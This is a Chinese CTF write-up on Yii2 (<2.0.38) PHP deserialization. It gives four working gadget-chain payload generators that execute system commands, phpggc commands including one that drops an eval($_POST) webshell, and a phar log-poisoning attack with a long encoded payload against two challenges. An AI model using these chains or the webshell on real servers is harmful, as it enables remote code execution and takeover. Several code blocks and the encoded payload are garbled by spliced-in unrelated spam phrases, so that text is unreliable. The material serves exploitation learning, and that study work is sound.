简介

Yii 是一套基于组件、用于开发大型 Web 应用的高性能 PHP 框架。Yii2 2.0.38 之前的版本存在反序列化漏洞：程序在对不可信数据调用 unserialize() 时，攻击者可通过构造特定的恶意请求执行任意命令。本篇分析一下 yii2 的利用链以及怎么自己去构造 payload，并结合 CTF 题目学习 yii2 框架。

Yii2<2.0.38反序列化

安装：在 github.com/yiisoft/yii… 下载 2.0.37 的版本

然后在 yii-basic-app-2.0.37\basic\config\web.php 里面给 cookieValidationKey 随便填一个值，运行 php yii serve，新建一个控制器

yii-basic-app-2.0.37\basic\controllers\TestController.php

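<?php
namespace app\controllers;

use yii\web\Controller;

/**
 * Throw-away controller used to reproduce the chains locally.
 *
 * It hands the raw `name` query parameter to unserialize(), i.e. exactly the
 * pattern the rest of this write-up exploits: any autoloadable class can be
 * instantiated and its __destruct/__wakeup/__call/__toString reached. Outside
 * a lab, decode request data with json_decode() or at least
 * unserialize($s, ['allowed_classes' => false]).
 */
class TestController extends Controller
{
    /**
     * @param string $name serialized payload, reached via ?r=test/test&name=...
     * @return mixed the unserialized value; only its side effects matter here
     */
    public function actionTest($name)
    {
        return unserialize($name);
    }
}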

就可以进行测试

?r=test/test&name=

链一

链的入口在

yii-basic-app-2.0.37\basic\vendor\yiisoft\yii2\db\BatchQueryResult.php

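public function __destruct()
{
    // make sure cursor is closed. This runs on every teardown, including that
    // of an object produced by unserialize(), which is what makes it the entry
    // point of chains 1 and 2; 2.0.38 adds a __wakeup to this class that stops
    // it from being unserialized at all.
    $this->reset();
}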

跟进 $this->reset();

public function reset(测验你的自卑程度)
{
if ($this->_daShelltaReader !== null) {
$thisshell怎样读->_dataReader->close();
}

这里的 $this->_dataReader 可控，并且对它调用了 close() 方法，那么找一个不存在 close() 方法但存在 __call 方法的类，就可以调用到它的 __call 了

yii-basic-app-2.0.37\basic\vendor\yiisoft\yii2-gii\src\Generator.php

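/**
 * Forwards any undefined method call to a formatter.
 *
 * Nothing restricts $method here, so on an unserialized Generator whose
 * $formatters array was chosen by the sender, any missing-method call
 * (close(), isRunning(), saveXML(), ...) becomes a call_user_func_array on
 * a callable the sender picked. $attributes is whatever the caller passed,
 * which for the chains in this write-up is empty.
 *
 * @param string $method     name of the missing method
 * @param array  $attributes arguments of the missing call
 * @return mixed the formatter's return value
 */
public function __call($method, $attributes)
{
    return $this->format($method, $attributes);
}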

这里的 $method 为 close，$attributes 为空，继续跟进 format

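/**
 * Looks the formatter up and invokes it with the given arguments.
 *
 * The callable comes from getFormatter(), i.e. from $this->formatters, and
 * $arguments is passed through untouched; with an empty argument list this is
 * a zero-argument call of an arbitrary callable.
 *
 * @param string $formatter formatter name (here: the missing method's name)
 * @param array  $arguments arguments forwarded to the callable
 * @return mixed the callable's return value
 */
public function format($formatter, $arguments = array())
{
    return call_user_func_array($this->getFormatter($formatter), $arguments);
}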

跟进getFormatter

public function getFormatter($formatter)
{
if (isset($this->formatthtml代码ers[$formatter])) {
return $this->formatters[$formatter];
}

似曾相识的代码，laravel5.8 的某条链就出现过。这里 $this->formatters 可控，也就是 $this->getFormatter($formatter) 的返回值可控，但是 $arguments 的值我们无法控制，为空

到这里可以执行 phpinfo

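<?php
// Chain 1, stage 1 (phpinfo):
//   yii\db\BatchQueryResult::__destruct -> reset() -> $_dataReader->close()
//   -> Faker\Generator::__call('close') -> format() -> call_user_func_array('phpinfo', []).
// Only the properties the chain reads are declared here; the receiving
// application autoloads the real classes while unserializing the string.
namespace yii\db {
    class BatchQueryResult
    {
        // read by reset(); any object without a close() method lands in __call
        private $_dataReader;

        public function __construct($_dataReader)
        {
            $this->_dataReader = $_dataReader;
        }
    }
}

namespace Faker {
    class Generator
    {
        // method name => callable, looked up by getFormatter() inside __call()
        protected $formatters = array();

        public function __construct($formatters)
        {
            $this->formatters = $formatters;
        }
    }
}

namespace {
    $a = new Faker\Generator(array('close' => 'phpinfo'));
    $b = new yii\db\BatchQueryResult($a);
    print(urlencode(serialize($b)));
}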

但是我们想要 RCE 的话，还要在 yii2 中已有的无参方法中进行挖掘

这里我们可以用正则匹配直接搜索含有 call_user_func 的无参函数

call_user_func($this->([a-zA-Z0-9]+), $this->([a-zA-Z0-9]+)

然后找到下面两个都比较好用

yii-basic-app-2.0.37\basic\vendor\yiisoft\yii2\rest\IndexAction.php
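/**
 * Runs the action.
 *
 * checkAccess and id are plain public properties, so after unserialize()
 * this is call_user_func(<sender-chosen callable>, <sender-chosen string>)
 * reachable from a method that itself takes no arguments -- exactly the
 * "no-argument method" the __call gadget needs. CreateAction::run() has
 * the same shape.
 *
 * @return mixed the data provider from prepareDataProvider()
 */
public function run()
{
    if ($this->checkAccess) {
        call_user_func($this->checkAccess, $this->id);
    }
    return $this->prepareDataProvider();
}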
yii-basic-app-2.0.37\basic\vendor\yiisoft\yii2\rest\CreateAction.php
public function run()
{
if ($this->checkAccess) {
call_user_func($thisshellfish-&ghtml5t;checkAccess, $this->idhtml网页制造);
}

这里的 $this->checkAccess 和 $this->id 都是我们可控的

所以直接构造就行了

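<?php
// Chain 1, full RCE:
//   yii\db\BatchQueryResult::__destruct -> reset() -> $_dataReader->close()
//   -> Faker\Generator::__call('close') -> format() -> call_user_func_array([$c, 'run'], [])
//   -> yii\rest\CreateAction::run() -> call_user_func($checkAccess, $id).
// Only the properties the chain reads are declared; the target autoloads the
// real classes during unserialize(). 2.0.38 adds a __wakeup to
// BatchQueryResult that blocks this entry point.
namespace yii\db {
    class BatchQueryResult
    {
        private $_dataReader;

        public function __construct($_dataReader)
        {
            $this->_dataReader = $_dataReader;
        }
    }
}

namespace Faker {
    class Generator
    {
        protected $formatters = array();

        public function __construct($formatters)
        {
            $this->formatters = $formatters;
        }
    }
}

namespace yii\rest {
    class CreateAction
    {
        public $checkAccess; // the callable run() hands to call_user_func
        public $id;          // its single argument

        public function __construct($checkAccess, $id)
        {
            $this->checkAccess = $checkAccess;
            $this->id = $id;
        }
    }
}

namespace {
    $c = new yii\rest\CreateAction('system', 'whoami');
    $b = new Faker\Generator(array('close' => array($c, 'run')));
    $a = new yii\db\BatchQueryResult($b);
    print(urlencode(serialize($a)));
}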

通过几道CTF题学习yii2框架

链二

这个是yii2 2.0.37的另外一条链

起点和链一相同，是 BatchQueryResult 的 __destruct，然后是 $this->_dataReader->close()，但是这里不找 __call，我们去找存在 close 方法的类

找到 yii-basic-app-2.0.37\basic\vendor\yiisoft\yii2\web\DbSession.php

class DbSession extends MultiFieldSession
{
...
public function closehtml个人网页完好代码()
{
if ($this->getIsActive()) {
// prepare writeCallback fields before session closes
$this-html代码>fields = $this->composeFields();

这里跟进 $this->composeFields()

abstract class MultiFieldSession extends Session
{
protected function composeFields($id = null, $data = null)
{
$fields = $this->writeCphpstudyallback ? call_user_func($this->writeCahtml标签llback, $this) : [];

这里 $this->writeCallback 可控，但传给它的参数 $this 是一个对象，所以这里直接调 phpinfo 的话应该不行，不过可以接上链一的 run 方法（即那个无参的方法）

这里直接构造即可

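<?php
// Chain 2: same entry as chain 1, but close() is resolved on a class that
// really has one:
//   yii\db\BatchQueryResult::__destruct -> reset() -> $_dataReader->close()
//   -> yii\web\DbSession::close() -> composeFields()
//   -> call_user_func($writeCallback, $this) -> yii\rest\CreateAction::run()
//   (the extra $this argument is ignored) -> call_user_func('system', 'whoami').
// Blocked on 2.0.38+ by the same BatchQueryResult::__wakeup that stops chain 1.
namespace yii\db {
    class BatchQueryResult
    {
        private $_dataReader;

        public function __construct($_dataReader)
        {
            $this->_dataReader = $_dataReader;
        }
    }
}

namespace yii\web {
    class DbSession
    {
        // composeFields() passes this straight to call_user_func
        public $writeCallback;

        public function __construct($writeCallback)
        {
            $this->writeCallback = $writeCallback;
        }
    }
}

namespace yii\rest {
    class CreateAction
    {
        public $checkAccess;
        public $id;

        public function __construct($checkAccess, $id)
        {
            $this->checkAccess = $checkAccess;
            $this->id = $id;
        }
    }
}

namespace {
    $c = new yii\rest\CreateAction('system', 'whoami');
    $b = new yii\web\DbSession(array($c, 'run'));
    $a = new yii\db\BatchQueryResult($b);
    print(urlencode(serialize($a)));
}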

链三

我们可以在 yii2 2.0.38 的 commit 中看到它加了一个 __wakeup

通过几道CTF题学习yii2框架

这里限制了链一的起点，BatchQueryResult 无法再使用，但后面 __call 的链没有被破坏，所以我们继续寻找一个 __destruct

yii-basic-app-2.0.37\basic\vendor\codeception\codeception\ext\RunProcess.php

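public function __destruct()
{
    // A second __destruct entry point, unaffected by the 2.0.38 fix (which
    // only touched BatchQueryResult). stopProcess() walks $this->processes
    // and calls isRunning() on each element, so a non-Process object placed
    // there by unserialize() ends up in that object's __call().
    $this->stopProcess();
}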

这里继续跟进 stopProcess

public function stopProcess测验纸怎样看是否怀孕()
{
foreach (array_reverse($this->prphp35ocesses)shell脚本编程100例 as $process) {
/** @var $process Process  **/
if (!$process->isRunning()) {
continue;
}

这里的 $this->processes 可控，所以可以利用 $process->isRunning() 来触发 __call

后面的利用就和链一相同了

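<?php
// Chain 3: an entry point that survives the 2.0.38 __wakeup fix.
//   Codeception\Extension\RunProcess::__destruct -> stopProcess()
//   -> $process->isRunning() on each element of $processes
//   -> Faker\Generator::__call('isRunning') -> format()
//   -> yii\rest\CreateAction::run() -> call_user_func('system', 'whoami').
namespace Codeception\Extension {
    class RunProcess
    {
        // iterated by stopProcess(); each element gets ->isRunning()
        private $processes = [];

        public function __construct($processes)
        {
            $this->processes[] = $processes;
        }
    }
}

namespace Faker {
    class Generator
    {
        protected $formatters = array();

        public function __construct($formatters)
        {
            $this->formatters = $formatters;
        }
    }
}

namespace yii\rest {
    class CreateAction
    {
        public $checkAccess;
        public $id;

        public function __construct($checkAccess, $id)
        {
            $this->checkAccess = $checkAccess;
            $this->id = $id;
        }
    }
}

namespace {
    $c = new yii\rest\CreateAction('system', 'whoami');
    $b = new Faker\Generator(array('isRunning' => array($c, 'run')));
    $a = new Codeception\Extension\RunProcess($b);
    print(urlencode(serialize($a)));
}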

链四

同样先找 __destruct

yii-basic-app-2.0.37\basic\vendor\swiftmailer\swiftmailer\lib\classes\Swift\KeyCache\DiskKeyCache.php

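public function __destruct()
{
    // $this->keys is a plain property and so is whatever unserialize() put
    // there; every namespace key is handed to clearAll(), which concatenates
    // it with $this->path.
    foreach ($this->keys as $nsKey => $null) {
        $this->clearAll($nsKey);
    }
}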

这里 $nsKey 可控，跟进 clearAll

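/**
 * Clears every cached key under the given namespace and removes its directory.
 *
 * @param string $nsKey cache namespace key
 */
public function clearAll($nsKey)
{
    if (array_key_exists($nsKey, $this->keys)) {
        foreach ($this->keys[$nsKey] as $itemKey => $null) {
            $this->clearKey($nsKey, $itemKey);
        }
        // String concatenation: if $this->path is an object, PHP invokes its
        // __toString() here -- the pivot chain 4 uses to reach a __call gadget.
        if (is_dir($this->path.'/'.$nsKey)) {
            rmdir($this->path.'/'.$nsKey);
        }
        unset($this->keys[$nsKey]);
    }
}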

这里没有触发 __call 的地方，但是存在字符串拼接，可以触发 __toString

随便找找就找到了 yii-basic-app-2.0.37\basic\vendor\codeception\codeception\src\Codeception\Util\XmlBuilder.php

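public function __toString()
{
    // $__dom__ is an ordinary protected property, so after unserialize() it
    // can be any object; calling saveXML() on one that lacks that method
    // reaches its __call(), which is how chain 4 continues.
    return $this->__dom__->saveXML();
}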

同样用它去触发 __call

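<?php
// Chain 4: __destruct -> string concatenation -> __toString -> __call.
//   Swift_KeyCache_DiskKeyCache::__destruct -> clearAll('kawhi')
//   -> $this->path.'/'.$nsKey forces Codeception\Util\XmlBuilder::__toString()
//   -> $__dom__->saveXML() -> Faker\Generator::__call('saveXML') -> format()
//   -> yii\rest\CreateAction::run() -> call_user_func('system', 'whoami').
namespace {
    class Swift_KeyCache_DiskKeyCache
    {
        // concatenated in clearAll(); an object here triggers __toString()
        private $path;
        // clearAll() is only entered for namespaces present in this array
        private $keys = [];

        public function __construct($path, $keys)
        {
            $this->path = $path;
            $this->keys = $keys;
        }
    }
}

namespace Codeception\Util {
    class XmlBuilder
    {
        // __toString() calls ->saveXML() on this
        protected $__dom__;

        public function __construct($__dom__)
        {
            $this->__dom__ = $__dom__;
        }
    }
}

namespace Faker {
    class Generator
    {
        protected $formatters = array();

        public function __construct($formatters)
        {
            $this->formatters = $formatters;
        }
    }
}

namespace yii\rest {
    class CreateAction
    {
        public $checkAccess;
        public $id;

        public function __construct($checkAccess, $id)
        {
            $this->checkAccess = $checkAccess;
            $this->id = $id;
        }
    }
}

namespace {
    $c = new yii\rest\CreateAction('system', 'whoami');
    $b = new Faker\Generator(array('saveXML' => array($c, 'run')));
    $a = new Codeception\Util\XmlBuilder($b);
    $d = new Swift_KeyCache_DiskKeyCache($a, array('kawhi' => 'kawhi'));
    print(urlencode(serialize($d)));
}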

通过几道CTF题学习yii2框架

phpggc

使用 ./phpggc -l yii2 可以看到有两条 yii2 的链

通过几道CTF题学习yii2框架

可以使用如下命令快速得到链，-u 表示 url 编码

./phpggc Yii2/RCE1 system id -u

phpggc 的链二的末尾是一个 eval，所以这里可以直接写 shell，-b 表示 base64 编码

./phpggc Yii2/RCE2 'file_put_contents("shell.php",base64_decode("PD9waHAgZXZhbCgkX1BPU1RbMV0pPz4="));' -b

CTF题目

[HMBCTF 2021]framework

把题目附件解压，看到 html\controllers\SiteController.php

class SiteController extends Controller
{
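/**
 * Challenge entry point: base64-decodes the `message` query parameter and
 * unserializes it with no class restriction, so the gadget chains from the
 * first half of this write-up apply directly (?r=site/about&message=...).
 *
 * @param string $message base64-encoded serialized data
 * @return void nothing is rendered; only unserialize()'s side effects matter
 */
public function actionAbout($message = 'Hello')
{
    $data = base64_decode($message);
    unserialize($data);
}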

这里可以这样传参

?r=site/about&message=

拿链一打了一下，发现 system 函数被 ban

通过几道CTF题学习yii2框架

这里用 phpggc yii2 的链二写一个 shell 进去，然后用蚁剑的 apache/moddisable，运行 /readflag 即可获取 flag

[CISCN2021 Quals]filter

听说这是配置文件里面的重要内容，或许对你有用!!

        'log' => [
'traceLevel' => YII_DEBUG ? 0 : 0,
'targets' => [
[
'class' => 'github永久回家地址yiilogFileTarget',
'levels' => ['error'],
'logVgithubars' => [],
],
],
],

看到附件的 SiteController.php 就改了这个地方

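/**
 * Challenge entry point: reads the `file` query parameter, opens it with
 * file_get_contents() and writes the result straight back with
 * file_put_contents(). The path is never validated, so stream wrappers are
 * honoured: php://filter/write=... rewrites the target (used below to empty
 * and then decode runtime/logs/app.log) and phar:// unserializes phar
 * metadata on read. Restricting the value to an allow-listed relative path,
 * or rejecting anything containing "://", would close both.
 *
 * @return string the rendered index view
 */
public function actionIndex()
{
    $file = Yii::$app->request->get('file');
    $res = file_get_contents($file);
    file_put_contents($file, $res);
    return $this->render('index');
}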

yii 框架的 runtime/logs 目录下有一个 app.log

看一下依赖，发现 monolog 符合

"require": {
"php": ">=5.6.0",
"yiisoft/yii2": "~2.0.14",
"yiisoft/yii2-bootstrap": "~2.0.0",
"yiisoft/yii2-swiftmailer": "~2.0.0 || ~2.1.0",
"mophp是前端仍是后端nolog/monolog":"1.19"
},

首先清空日志文件

?file=php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../runtime/logs/app.log

phpggc 生成

php -d'phar.readonly=0' ./phpggc Monolog/RCE1 "phpinfo" "1" --phar phar -o php://output | base64 -w0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:].zfill(2) + '=00' for i in sys.stdin.read()]).upper())"

写入日志，注意最后面要加个字符 a

/?file==50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2Bshell脚本=00=44=00=51=00=71=00=39=00=41=00=67=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41shell怎样读=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=6Dphp是什么=00=41=00=67=00=41=00=41=00=54测验=00=7A=00=6F=00=7A=00=4D=00=6A=00=6F=00=69=00=54=00=57=00=39=00=75=00=62=00=32=00=78=00=76=00=5A=00=31=00=78=00=49github中文官网网页=00=59=00=57=00=35=00=6B=00=62=00=47=00=56=00=79=00=58=00=46=00=4E=00=35=00=63=00=32=00=78=00=76html代码=00=5A=00=31=00=56=00=6B=00=63=00=45=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33php钱银=00=4D=00=36=00=4F=00=54=00=phpmyadmin6F=00=69=00=41=00=43=00=6F=00=41=00=63=00=32=00=39=00=6A=00=61=00=32=00=56=00=3测验网速0=00=49=00=6AShell=00=7shell是什么意思中文4=00=50=00=4F=00=6A=00=49=00=35=00=4F=00=69=00=4Aphp是什么=00=4E=00=62=00=32=00=35=00=76=00=62=00=47=00=39=00=6E=00=58=00=45github中文官网网页=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=4A测验郁闷程度的问卷=00=63PHP=00=51=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=53=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=html标签特点大全49=00=36=00=4E=00=7A=00=70=00=37=00=63=00=7A=00=6shell脚本F=00=78=00=4D=00=44html代码=00=6F=00=69=00=41=00=43=00=6F=00=41=00=测验怀孕的试纸图片一深一浅61=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=49=00=37=00=54=00=7A=00=6F=00=79=00=4F=00=54=00=6F=00=6github9=00=54=00=57=00=39=00=75=00=62=00=32=00=78=00=76=00=5A=00=31=00=78=00=49=00=59=00=57=00=35=00=6B=00=62=00=47=00=56=00=79=00=58=00=45=00=4Aphp7=00=31=00=5APHP=00=6D=00=5A=00=6C=00=63=00=6B=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=63=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=68=00=68=00=62=00=6D=00=52=00=7shell怎样读3=00=5A=00=58=00=49=00=69=00=4F=00=30=00=34=00=37=00=63=0
0=7A=00=6F=00=78=00=4D=00=7A=html500=6F=00=69=00=41=00=github43=00=6F=00=41=00=59=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=55=00=32=php700=6C=00=36=00=5A=00=53=00=49=00=37=00=61=00=54=00=6F=00=74=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=6B=00=36=00=49=00=67github是干什么的=00=41Git=00=71=00=41=00=47=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=69=00=49=00=37=00=59=00=54=00=6F=00=78=00=4F=00=6E=00=74=00=70=00=4F=00=6AGit=00=41=00=37=00=59=00=54=00=6F=00=79=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=shell脚本37=00=63=00=7Ashell指令=00=6F=00=78=00=4F=00=69=00=49=00=78=00=49=00=6A=00=74=00=7A=00=4F=00=6A=00=55=00=36=00=49=00=6D=00=78=00=6C=00=64=00=6D=00=56=00=phpmyadmin73=00=49=00=6A=00=74=00=4Fphp是前端仍是后端=00=4F=00=33=00=31=00=39html代码=00=63=00=7A=00=6F=00=34=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42gitlab=00=73=00=5A=00=58=00=5A=00=6C=00=62=00=43=00=49=00=37=00=54=00=6A=00=74测验工程师=00=7Agiti=00=4F=00=6A=00=45=00=3shelly0=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=70=00=62=00=6D=00=6C=00=30=00=61=00=57=00=46=00=73=00=61测验你的自卑程度=00=58=00=70=00=6Cshell脚本根本指令=00=5A=00=43=00=49=00=37=00=59=00=6A=00=6F=00=78=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=51=00=36=00=49=00=67html标签特点大全=00=41=00=71=00=41=00=47=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=6B=00=78=00=70=00=62=00=57=00=6C=00=30=00=49=00=6A=00=74=00=70=00=4F=00=69=00=30=00=78=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=4D=00=36=00=49=00=67=00=41=00=html网页制造71=00=41html简略网页代码=00=48=00=HTML42=00=79=00=62=00=32=00=4E测验郁闷程度的问卷=00=6C=00=63=00=33=00=4E=00=7github是干什么的6=00=63=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=6A=00=70=00=37=00=61=00=54=00=6F=00=77=00=4F=00=33=00=4D=00=36=00=4E=00=7A=00=6F=00=69giti=00=59=00=33=00=56=00=79=00=63=00=6D=00=56=00=75=00=64=00=43=00=49=00=37=00=61=00=54=00=6F=00=78=00=4F=00=33=00=4D=00=36=00=4E=00=7A=00=html个人网页完好代码6F=00=69=00=63=00=47测验工程师=00=68=00=77=00=61=00=57=00=35=00=6D=00=62=00=79=shell怎样读00=49=00=37=00=66=00=58=00=31=00=7Ahtml网页制造=00=4F=00=6A=00=45=00=7A=00=4F=00=69=00=49=00=41php中文网=
00=4B=00=67shell编程=00=42=00=测验工程师69=00=64=00=57=00=5A=00=6D=00=5A=00=58=00=4A=00=54=00=61=00=58=00=70=00=6C=00=49=00=6A=00=74=00=70=00=4F=00=69=00=30=00=78=00=4F=00=33=00=4D=00=36=00=4F=00=54=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=49=00=6A=00=74=00=68=00=4F=00=6A=00=45=00=36=00=65=00=32=00=6shell是什么意思中文Bphp7=00=36=00=4D=00=44=00=74=00=68=00=4F=00=6A=00=49=00=36=00=65=00=32=00=6B=00=36shellfish=00=4Dhtml标签=00=44=00=74=00=7A=00=4F=00=6A=00=45=00=36=00=49测验郁闷症的20道题=00=6A=00=45=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=54=00=6F=00=69=00=62=00=47=00=56=00=32=00=5A=00=57=00=测验你的自卑程度77shellfish=00=69=00=4F=00=30=00=34=00=37=00=66=00=58=00=31=00=7A=00=4F=00=6A=00=67=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=78=00=6C=00=64=00=6D=00=56=00=73shell是什么意思中文=00=49gitee=00=6A=00=74=00=4F=00=4Fphp是什么言语=00=33=00=4D=00=36=00=4D=00=54=00=51=00=36=00=49=00=67=00=4html标签特点大全1=00=71=00=41=00=47=00=6C=00=75=00=61=00=58html标签=00=52=00=70=00=59=00=57=00=78=00=70=00=65=00=6D=00=56=00=6B=00=49=00=6A=00=74=00=69=00=4F=00=6A=00=45=00=37=00=63=00=7A=00=6F测验=00=78=00=php是前端仍是后端4E=00=44=00=6F=00=69=00=github中文官网网页41=00=43=00=6F=00=41=00=59=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=54=00=47=00=6C=00=74=00=61=00=58=00=51=00=69=00=4F=00=32=00=6shell指令B=00=36=00=4C=00=54=00=45=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=7A=00=6F=00=69=00=41=00=43=00=6F=00=41=00=63HTML=00=48=00=4A=00=76=00=59=00=32=00=56=00=7A=00=63=00=32=00=39=00=79测验网速=00=63=00=79=00=49=00=37=00=59=00=54测验工程师=00=6F=00=79=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=63=00=github是干什么的7A=00=6F=00=33=00=4F=00=69shell编程=00=4A=00=6A=00=64=00=58=00=4A=00=79=00=php355A=00=57=00=35=00=30=00=49=00=6A=00=74=00=70=00=4F=00=6A=00=45=00=37=00=63=00=7A=00=6F=00=33=00=4F=00=69=00=4A=00=77=00=61=00=48=00=42=00=70=00=62=00=6D=00=5A=00=76php7=00=49=00=6A=00=74=00=39=00=66=00=58=00=30=00=46=00=41=00=41=00=41=测验郁闷程度的问卷00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=47=00=
59=00=61=00=33=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=测验郁闷症45=00=41shell脚本编程100例=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=5shell脚本编程100例1=00=45=00=41=00=41=00=41=00=41=00=47=00=59=00=61=00=33=00=59=00=41=00=51=00=41=00=41=00=41=00=html标签41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45PHP=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=30=00=5A=00=58=00=4E=00=30=00=64=00=47giti=00=56=00=7A=00=64测验郁闷症=00=4A=00=41=00=61=00=shell的意思47=00=73=00=75=00=53=00=31=00=47=00=68=00=54=00=49=00=2B=00=6B=00=4B=00=58=00=33=00=45=00=68=00=2B=00=4D=00=44=00=71=00=54=00=76=00=6E=测验工程师00=6F=00=41=00=67=00=41=00=41=00=41=00=45=00=64=00=43=00=测验郁闷症54=00=55=00=49=00=3D=00a

保存phar的内容

/?file=php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../runtime/logs/app.log

最后用 phar 协议打一下

/?file=phar://../runtime/logs/app.log/test.txt

通过几道CTF题学习yii2框架

然后在根目录找到This_is_flaaagggg

然后用这个找一下flag即可

php -d'phar.readonly=0' ./phpggc Monolog/RCE1 "system" "cat /This_is_flaaagggg" --phar phar -o php://output | base64 -w0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:].zfill(2) + '=00' for i in sys.stdin.read()]).upper())"
